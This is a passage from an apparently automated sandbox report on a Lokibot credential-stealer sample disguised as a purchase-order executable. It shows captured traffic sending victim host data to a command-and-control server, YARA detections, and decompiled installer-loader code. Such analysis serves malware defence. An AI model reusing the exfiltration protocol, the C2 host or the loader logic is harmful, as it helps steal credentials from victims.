                    Jan 14, 2022 07:15:27.721211910 CET1342OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:27.853188038 CET | 1343 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:26 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    9 | 192.168.2.4 | 49774 | 104.223.93.105 | 80 | C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 07:15:28.997591972 CET | 1343 | OUT | POST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:29.122049093 CET1344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:29.253197908 CET | 1344 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:28 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Memory Usage

                    High Level Behavior Distribution

                    Behavior

                    System Behavior

                    General

                    Start time: 07:15:06
                    Start date: 14/01/2022
                    Path: C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Wow64 process (32bit): true
                    Commandline: "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
                    Imagebase: 0x400000
                    File size: 247015 bytes
                    MD5 hash: D62B8A5FDB90E9241FF0EEF6EA035E32
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Yara matches:
                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation: low

                    General

                    Start time: 07:15:07
                    Start date: 14/01/2022
                    Path: C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Wow64 process (32bit): true
                    Commandline: "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
                    Imagebase: 0x400000
                    File size: 247015 bytes
                    MD5 hash: D62B8A5FDB90E9241FF0EEF6EA035E32
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.898744992.00000000006FC000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    Code Analysis

                      Execution Graph

                      Execution Coverage:12%
                      Dynamic/Decrypted Code Coverage:6.2%
                      Signature Coverage:22.4%
                      Total number of Nodes:1328
                      Total number of Limit Nodes:25

                      Graph

405880 3787->3788 3889 40575c GetFileAttributesA CreateFileA 3788->3889 3790 40588d 3790->3783 3791 40589c GetFileSize GlobalAlloc 3790->3791 3792 405929 CloseHandle 3791->3792 3793 4058ba ReadFile 3791->3793 3792->3783 3793->3792 3794 4058ce 3793->3794 3794->3792 3890 4056d1 lstrlenA 3794->3890 3797 4058e3 3895 405a85 lstrcpynA 3797->3895 3798 40593d 3799 4056d1 4 API calls 3798->3799 3801 4058f1 3799->3801 3802 405904 SetFilePointer WriteFile GlobalFree 3801->3802 3802->3792 3804 405320 3803->3804 3805 405314 CloseHandle 3803->3805 3804->3649 3805->3804 3807 401389 2 API calls 3806->3807 3808 401420 3807->3808 3808->3616 3809->3668 3810->3670 3812 4055cc 3811->3812 3813 4055d1 CharPrevA 3812->3813 3814 402cc7 3812->3814 3813->3812 3813->3814 3815 405a85 lstrcpynA 3814->3815 3815->3674 3816->3684 3817->3692 3819 4038ab 3818->3819 3836 4059e3 wsprintfA 3819->3836 3821 40391c 3822 405aa7 18 API calls 3821->3822 3823 403928 SetWindowTextA 3822->3823 3824 403944 3823->3824 3825 40365e 3823->3825 3824->3825 3826 405aa7 18 API calls 3824->3826 3825->3709 3826->3824 3827->3705 3828->3711 3837 403e83 3829->3837 3831 404f18 3835 404f3f 3831->3835 3840 401389 3831->3840 3832 403e83 SendMessageA 3833 404f51 OleUninitialize 3832->3833 3833->3742 3835->3832 3836->3821 3838 403e9b 3837->3838 3839 403e8c SendMessageA 3837->3839 3838->3831 3839->3838 3842 401390 3840->3842 3841 4013fe 3841->3831 3842->3841 3843 4013cb MulDiv SendMessageA 3842->3843 3843->3842 3844->3754 3846 405659 18 API calls 3845->3846 3847 4053be 3846->3847 3848 4053c7 DeleteFileA 3847->3848 3849 4053de 3847->3849 3850 403416 OleUninitialize 3848->3850 3851 40551d 3849->3851 3886 405a85 lstrcpynA 3849->3886 3850->3613 3850->3614 3851->3850 3856 405d7c 2 API calls 3851->3856 3853 405408 3854 405419 3853->3854 3855 40540c lstrcatA 3853->3855 3858 4055bf 2 API calls 3854->3858 3857 40541f 3855->3857 3859 405538 3856->3859 3860 40542d lstrcatA 3857->3860 3861 405438 lstrlenA FindFirstFileA 3857->3861 3858->3857 
3859->3850 3862 405578 3 API calls 3859->3862 3860->3861 3863 405513 3861->3863 3872 40545c 3861->3872 3864 405542 3862->3864 3863->3851 3866 40573d 2 API calls 3864->3866 3865 4055a3 CharNextA 3865->3872 3867 405548 RemoveDirectoryA 3866->3867 3868 405553 3867->3868 3869 40556a 3867->3869 3868->3850 3874 405559 3868->3874 3870 404e23 25 API calls 3869->3870 3870->3850 3871 4054f2 FindNextFileA 3871->3872 3875 40550a FindClose 3871->3875 3872->3865 3872->3871 3879 40573d 2 API calls 3872->3879 3881 4053aa 59 API calls 3872->3881 3883 404e23 25 API calls 3872->3883 3884 404e23 25 API calls 3872->3884 3885 4057d3 38 API calls 3872->3885 3887 405a85 lstrcpynA 3872->3887 3876 404e23 25 API calls 3874->3876 3875->3863 3877 405561 3876->3877 3878 4057d3 38 API calls 3877->3878 3882 405568 3878->3882 3880 4054bf DeleteFileA 3879->3880 3880->3872 3881->3872 3882->3850 3883->3871 3884->3872 3885->3872 3886->3853 3887->3872 3888->3784 3889->3790 3891 405707 lstrlenA 3890->3891 3892 405711 3891->3892 3893 4056e5 lstrcmpiA 3891->3893 3892->3797 3892->3798 3893->3892 3894 4056fe CharNextA 3893->3894 3894->3891 3895->3801 4768 401ca5 4769 4029cb 18 API calls 4768->4769 4770 401cb5 SetWindowLongA 4769->4770 4771 40287d 4770->4771 4772 401a26 4773 4029cb 18 API calls 4772->4773 4774 401a2c 4773->4774 4775 4029cb 18 API calls 4774->4775 4776 4019d6 4775->4776 4777 4045aa 4778 4045d6 4777->4778 4779 4045ba 4777->4779 4781 404609 4778->4781 4782 4045dc SHGetPathFromIDListA 4778->4782 4788 40532a GetDlgItemTextA 4779->4788 4784 4045f3 SendMessageA 4782->4784 4785 4045ec 4782->4785 4783 4045c7 SendMessageA 4783->4778 4784->4781 4786 40140b 2 API calls 4785->4786 4786->4784 4788->4783 4789 402b2d 4790 402b55 4789->4790 4791 402b3c SetTimer 4789->4791 4792 402ba3 4790->4792 4793 402ba9 MulDiv 4790->4793 4791->4790 4794 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4793->4794 4794->4792 4796 401bad 4797 4029cb 18 API calls 4796->4797 4798 401bb4 4797->4798 4799 4029cb 18 API calls 
4798->4799 4800 401bbe 4799->4800 4801 401bce 4800->4801 4802 4029e8 18 API calls 4800->4802 4803 401bde 4801->4803 4804 4029e8 18 API calls 4801->4804 4802->4801 4805 401be9 4803->4805 4806 401c2d 4803->4806 4804->4803 4808 4029cb 18 API calls 4805->4808 4807 4029e8 18 API calls 4806->4807 4809 401c32 4807->4809 4810 401bee 4808->4810 4811 4029e8 18 API calls 4809->4811 4812 4029cb 18 API calls 4810->4812 4814 401c3b FindWindowExA 4811->4814 4813 401bf7 4812->4813 4815 401c1d SendMessageA 4813->4815 4816 401bff SendMessageTimeoutA 4813->4816 4817 401c59 4814->4817 4815->4817 4816->4817 4818 40422e 4819 404264 4818->4819 4820 40423e 4818->4820 4822 403e9e 8 API calls 4819->4822 4821 403e37 19 API calls 4820->4821 4823 40424b SetDlgItemTextA 4821->4823 4824 404270 4822->4824 4823->4819 4825 402630 4826 4029e8 18 API calls 4825->4826 4827 402637 FindFirstFileA 4826->4827 4828 40265a 4827->4828 4832 40264a 4827->4832 4830 402661 4828->4830 4833 4059e3 wsprintfA 4828->4833 4834 405a85 lstrcpynA 4830->4834 4833->4830 4834->4832 4842 4024b0 4843 4024b5 4842->4843 4844 4024c6 4842->4844 4845 4029cb 18 API calls 4843->4845 4846 4029e8 18 API calls 4844->4846 4847 4024bc 4845->4847 4848 4024cd lstrlenA 4846->4848 4849 4024ec WriteFile 4847->4849 4850 40264e 4847->4850 4848->4847 4849->4850 3443 4015b3 3444 4029e8 18 API calls 3443->3444 3445 4015ba 3444->3445 3461 40560c CharNextA CharNextA 3445->3461 3447 40160a 3449 40162d 3447->3449 3450 40160f 3447->3450 3448 4055a3 CharNextA 3451 4015d0 CreateDirectoryA 3448->3451 3455 401423 25 API calls 3449->3455 3452 401423 25 API calls 3450->3452 3453 4015e5 GetLastError 3451->3453 3457 4015c2 3451->3457 3454 401616 3452->3454 3456 4015f2 GetFileAttributesA 3453->3456 3453->3457 3467 405a85 lstrcpynA 3454->3467 3460 40215b 3455->3460 3456->3457 3457->3447 3457->3448 3459 401621 SetCurrentDirectoryA 3459->3460 3462 405626 3461->3462 3464 405632 3461->3464 3463 40562d CharNextA 3462->3463 3462->3464 3466 40564f 3463->3466 3465 
4055a3 CharNextA 3464->3465 3464->3466 3465->3464 3466->3457 3467->3459 3468 401734 3469 4029e8 18 API calls 3468->3469 3470 40173b 3469->3470 3471 401761 3470->3471 3472 401759 3470->3472 3523 405a85 lstrcpynA 3471->3523 3522 405a85 lstrcpynA 3472->3522 3475 40175f 3479 405ce3 5 API calls 3475->3479 3476 40176c 3524 405578 lstrlenA CharPrevA 3476->3524 3481 40177e 3479->3481 3484 401795 CompareFileTime 3481->3484 3485 401859 3481->3485 3486 401830 3481->3486 3490 405a85 lstrcpynA 3481->3490 3494 405aa7 18 API calls 3481->3494 3506 40575c GetFileAttributesA CreateFileA 3481->3506 3527 405d7c FindFirstFileA 3481->3527 3530 40573d GetFileAttributesA 3481->3530 3533 405346 3481->3533 3484->3481 3487 404e23 25 API calls 3485->3487 3489 404e23 25 API calls 3486->3489 3496 401845 3486->3496 3488 401863 3487->3488 3507 402f01 3488->3507 3489->3496 3490->3481 3493 40188a SetFileTime 3495 40189c FindCloseChangeNotification 3493->3495 3494->3481 3495->3496 3497 4018ad 3495->3497 3498 4018b2 3497->3498 3499 4018c5 3497->3499 3500 405aa7 18 API calls 3498->3500 3501 405aa7 18 API calls 3499->3501 3503 4018ba lstrcatA 3500->3503 3504 4018cd 3501->3504 3503->3504 3505 405346 MessageBoxIndirectA 3504->3505 3505->3496 3506->3481 3508 402f12 SetFilePointer 3507->3508 3509 402f2e 3507->3509 3508->3509 3537 40302c GetTickCount 3509->3537 3512 402f3f ReadFile 3513 402f5f 3512->3513 3518 401876 3512->3518 3514 40302c 42 API calls 3513->3514 3513->3518 3515 402f76 3514->3515 3516 402ff1 ReadFile 3515->3516 3515->3518 3519 402f86 3515->3519 3516->3518 3518->3493 3518->3495 3519->3518 3520 402fa1 ReadFile 3519->3520 3521 402fba WriteFile 3519->3521 3520->3518 3520->3519 3521->3518 3521->3519 3522->3475 3523->3476 3525 405592 lstrcatA 3524->3525 3526 401772 lstrcatA 3524->3526 3525->3526 3526->3475 3528 405d92 FindClose 3527->3528 3529 405d9d 3527->3529 3528->3529 3529->3481 3531 405759 3530->3531 3532 40574c SetFileAttributesA 3530->3532 3531->3481 3532->3531 3534 40535b 3533->3534 3535 
4053a7 3534->3535 3536 40536f MessageBoxIndirectA 3534->3536 3535->3481 3536->3535 3538 403196 3537->3538 3539 40305b 3537->3539 3540 402bc5 32 API calls 3538->3540 3550 4031da SetFilePointer 3539->3550 3546 402f37 3540->3546 3542 403066 SetFilePointer 3547 40308b 3542->3547 3546->3512 3546->3518 3547->3546 3548 403120 WriteFile 3547->3548 3549 403177 SetFilePointer 3547->3549 3551 4031a8 ReadFile 3547->3551 3553 405e9d 3547->3553 3560 402bc5 3547->3560 3548->3546 3548->3547 3549->3538 3550->3542 3552 4031c9 3551->3552 3552->3547 3554 405ec2 3553->3554 3555 405eca 3553->3555 3554->3547 3555->3554 3556 405f51 GlobalFree 3555->3556 3557 405f5a GlobalAlloc 3555->3557 3558 405fd1 GlobalAlloc 3555->3558 3559 405fc8 GlobalFree 3555->3559 3556->3557 3557->3554 3557->3555 3558->3554 3558->3555 3559->3558 3561 402bd3 3560->3561 3562 402beb 3560->3562 3563 402be3 3561->3563 3564 402bdc DestroyWindow 3561->3564 3565 402bf3 3562->3565 3566 402bfb GetTickCount 3562->3566 3563->3547 3564->3563 3575 405ddc 3565->3575 3566->3563 3568 402c09 3566->3568 3569 402c3e CreateDialogParamA 3568->3569 3570 402c11 3568->3570 3569->3563 3570->3563 3579 402ba9 3570->3579 3572 402c1f wsprintfA 3573 404e23 25 API calls 3572->3573 3574 402c3c 3573->3574 3574->3563 3576 405df9 PeekMessageA 3575->3576 3577 405e09 3576->3577 3578 405def DispatchMessageA 3576->3578 3577->3563 3578->3576 3580 402bb8 3579->3580 3581 402bba MulDiv 3579->3581 3580->3581 3581->3572 4851 401634 4852 4029e8 18 API calls 4851->4852 4853 40163a 4852->4853 4854 405d7c 2 API calls 4853->4854 4855 401640 4854->4855 4856 401934 4857 4029cb 18 API calls 4856->4857 4858 40193b 4857->4858 4859 4029cb 18 API calls 4858->4859 4860 401945 4859->4860 4861 4029e8 18 API calls 4860->4861 4863 40194e 4861->4863 4862 401961 lstrlenA 4865 40196b 4862->4865 4863->4862 4864 40199c 4863->4864 4865->4864 4869 405a85 lstrcpynA 4865->4869 4867 401985 4867->4864 4868 401992 lstrlenA 4867->4868 4868->4864 4869->4867 4870 4019b5 4871 4029e8 18 API 
calls 4870->4871 4872 4019bc 4871->4872 4873 4029e8 18 API calls 4872->4873 4874 4019c5 4873->4874 4875 4019cc lstrcmpiA 4874->4875 4876 4019de lstrcmpA 4874->4876 4877 4019d2 4875->4877 4876->4877 4878 4014b7 4879 4014bd 4878->4879 4880 401389 2 API calls 4879->4880 4881 4014c5 4880->4881 4882 4025be 4883 4025c5 4882->4883 4885 40282a 4882->4885 4884 4029cb 18 API calls 4883->4884 4886 4025d0 4884->4886 4887 4025d7 SetFilePointer 4886->4887 4887->4885 4888 4025e7 4887->4888 4890 4059e3 wsprintfA 4888->4890 4890->4885

                      Executed Functions

                      Control-flow Graph

                      C-Code - Quality: 82%
                      			_entry_() {
                      				struct _SHFILEINFOA _v360;
                      				struct _SECURITY_ATTRIBUTES* _v376;
                      				char _v380;
                      				CHAR* _v384;
                      				char _v396;
                      				int _v400;
                      				int _v404;
                      				CHAR* _v408;
                      				intOrPtr _v412;
                      				int _v416;
                      				intOrPtr _v420;
                      				struct _SECURITY_ATTRIBUTES* _v424;
                      				void* _v432;
                      				int _t34;
                      				CHAR* _t39;
                      				char* _t42;
                      				signed int _t44;
                      				void* _t48;
                      				intOrPtr _t50;
                      				signed int _t52;
                      				signed int _t55;
                      				int _t56;
                      				signed int _t60;
                      				void* _t79;
                      				void* _t89;
                      				void* _t91;
                      				char* _t96;
                      				signed int _t97;
                      				void* _t98;
                      				signed int _t99;
                      				signed int _t100;
                      				signed int _t103;
                      				CHAR* _t105;
                      				signed int _t106;
                      				char _t120;
                      
                      				_v376 = 0;
                      				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                      				_t99 = 0;
                      				_v380 = 0x20;
                      				__imp__#17();
                      				_t34 = SetErrorMode(0x8001); // executed
                      				__imp__OleInitialize(0); // executed
                      				 *0x423f58 = _t34;
                      				 *0x423ea4 = E00405DA3(8);
                      				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                      				E00405A85(0x4236a0, "NSIS Error");
                      				_t39 = GetCommandLineA();
                      				_t96 = "\"C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe\" ";
                      				E00405A85(_t96, _t39);
                      				 *0x423ea0 = GetModuleHandleA(0);
                      				_t42 = _t96;
                      				if("\"C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe\" " == 0x22) {
                      					_v404 = 0x22;
                      					_t42 =  &M00429001;
                      				}
                      				_t44 = CharNextA(E004055A3(_t42, _v404));
                      				_v404 = _t44;
                      				while(1) {
                      					_t91 =  *_t44;
                      					_t109 = _t91;
                      					if(_t91 == 0) {
                      						break;
                      					}
                      					__eflags = _t91 - 0x20;
                      					if(_t91 != 0x20) {
                      						L5:
                      						__eflags =  *_t44 - 0x22;
                      						_v404 = 0x20;
                      						if( *_t44 == 0x22) {
                      							_t44 = _t44 + 1;
                      							__eflags = _t44;
                      							_v404 = 0x22;
                      						}
                      						__eflags =  *_t44 - 0x2f;
                      						if( *_t44 != 0x2f) {
                      							L15:
                      							_t44 = E004055A3(_t44, _v404);
                      							__eflags =  *_t44 - 0x22;
                      							if(__eflags == 0) {
                      								_t44 = _t44 + 1;
                      								__eflags = _t44;
                      							}
                      							continue;
                      						} else {
                      							_t44 = _t44 + 1;
                      							__eflags =  *_t44 - 0x53;
                      							if( *_t44 == 0x53) {
                      								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                      								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                      									_t99 = _t99 | 0x00000002;
                      									__eflags = _t99;
                      								}
                      							}
                      							__eflags =  *_t44 - 0x4352434e;
                      							if( *_t44 == 0x4352434e) {
                      								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                      								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                      									_t99 = _t99 | 0x00000004;
                      									__eflags = _t99;
                      								}
                      							}
                      							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                      							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                      								 *((intOrPtr*)(_t44 - 2)) = 0;
                      								__eflags = _t44 + 2;
                      								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t44 + 2);
                      								L20:
                      								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                      								GetTempPathA(0x400, _t105);
                      								_t48 = E004031F1(_t109);
                      								_t110 = _t48;
                      								if(_t48 != 0) {
                      									L22:
                      									DeleteFileA("1033"); // executed
                      									_t50 = E00402C5B(_t111, _t99); // executed
                      									_v412 = _t50;
                      									if(_t50 != 0) {
                      										L32:
                      										E004035A6();
                      										__imp__OleUninitialize();
                      										if(_v408 == 0) {
                      											__eflags =  *0x423f34;
                      											if( *0x423f34 != 0) {
                      												_t106 = E00405DA3(3);
                      												_t100 = E00405DA3(4);
                      												_t55 = E00405DA3(5);
                      												__eflags = _t106;
                      												_t97 = _t55;
                      												if(_t106 != 0) {
                      													__eflags = _t100;
                      													if(_t100 != 0) {
                      														__eflags = _t97;
                      														if(_t97 != 0) {
                      															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                      															__eflags = _t60;
                      															if(_t60 != 0) {
                      																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                      																_v416 = 1;
                      																_v404 = 2;
                      																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                      															}
                      														}
                      													}
                      												}
                      												_t56 = ExitWindowsEx(2, 0);
                      												__eflags = _t56;
                      												if(_t56 == 0) {
                      													E0040140B(9);
                      												}
                      											}
                      											_t52 =  *0x423f4c;
                      											__eflags = _t52 - 0xffffffff;
                      											if(_t52 != 0xffffffff) {
                      												_v400 = _t52;
                      											}
                      											ExitProcess(_v400);
                      										}
                      										E00405346(_v408, 0x200010);
                      										ExitProcess(2);
                      									}
                      									if( *0x423ebc == 0) {
                      										L31:
                      										 *0x423f4c =  *0x423f4c | 0xffffffff;
                      										_v400 = E004035E3();
                      										goto L32;
                      									}
                      									_t103 = E004055A3(_t96, 0);
                      									while(_t103 >= _t96) {
                      										__eflags =  *_t103 - 0x3d3f5f20;
                      										if(__eflags == 0) {
                      											break;
                      										}
                      										_t103 = _t103 - 1;
                      										__eflags = _t103;
                      									}
                      									_t115 = _t103 - _t96;
                      									_v408 = "Error launching installer";
                      									if(_t103 < _t96) {
                      										lstrcatA(_t105, "~nsu.tmp");
                      										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
                      											goto L32;
                      										}
                      										CreateDirectoryA(_t105, 0);
                      										SetCurrentDirectoryA(_t105);
                      										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                      										if(_t120 == 0) {
                      											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", "C:\\Users\\jones\\Desktop");
                      										}
                      										E00405A85(0x424000, _v396);
                      										 *0x424400 = 0x41;
                      										_t98 = 0x1a;
                      										do {
                      											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
                      											DeleteFileA(0x41f050);
                      											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe", 0x41f050, 1) != 0) {
                      												_push(0);
                      												_push(0x41f050);
                      												E004057D3();
                      												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
                      												_t79 = E004052E5(0x41f050);
                      												if(_t79 != 0) {
                      													CloseHandle(_t79);
                      													_v416 = 0;
                      												}
                      											}
                      											 *0x424400 =  *0x424400 + 1;
                      											_t98 = _t98 - 1;
                      										} while (_t98 != 0);
                      										_push(0);
                      										_push(_t105);
                      										E004057D3();
                      										goto L32;
                      									}
                      									 *_t103 = 0;
                      									_t104 = _t103 + 4;
                      									if(E00405659(_t115, _t103 + 4) == 0) {
                      										goto L32;
                      									}
                      									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                      									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                      									_v424 = 0;
                      									goto L31;
                      								}
                      								GetWindowsDirectoryA(_t105, 0x3fb);
                      								lstrcatA(_t105, "\\Temp");
                      								_t89 = E004031F1(_t110);
                      								_t111 = _t89;
                      								if(_t89 == 0) {
                      									goto L32;
                      								}
                      								goto L22;
                      							}
                      							goto L15;
                      						}
                      					} else {
                      						goto L4;
                      					}
                      					do {
                      						L4:
                      						_t44 = _t44 + 1;
                      						__eflags =  *_t44 - 0x20;
                      					} while ( *_t44 == 0x20);
                      					goto L5;
                      				}
                      				goto L20;
                      			}






































                      0x004032e2
                      0x004032e3
                      0x004032e3
                      0x00000000
                      0x004032e2
                      0x00000000

                      APIs
                      • #17.COMCTL32 ref: 00403244
                      • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                      • OleInitialize.OLE32(00000000), ref: 00403256
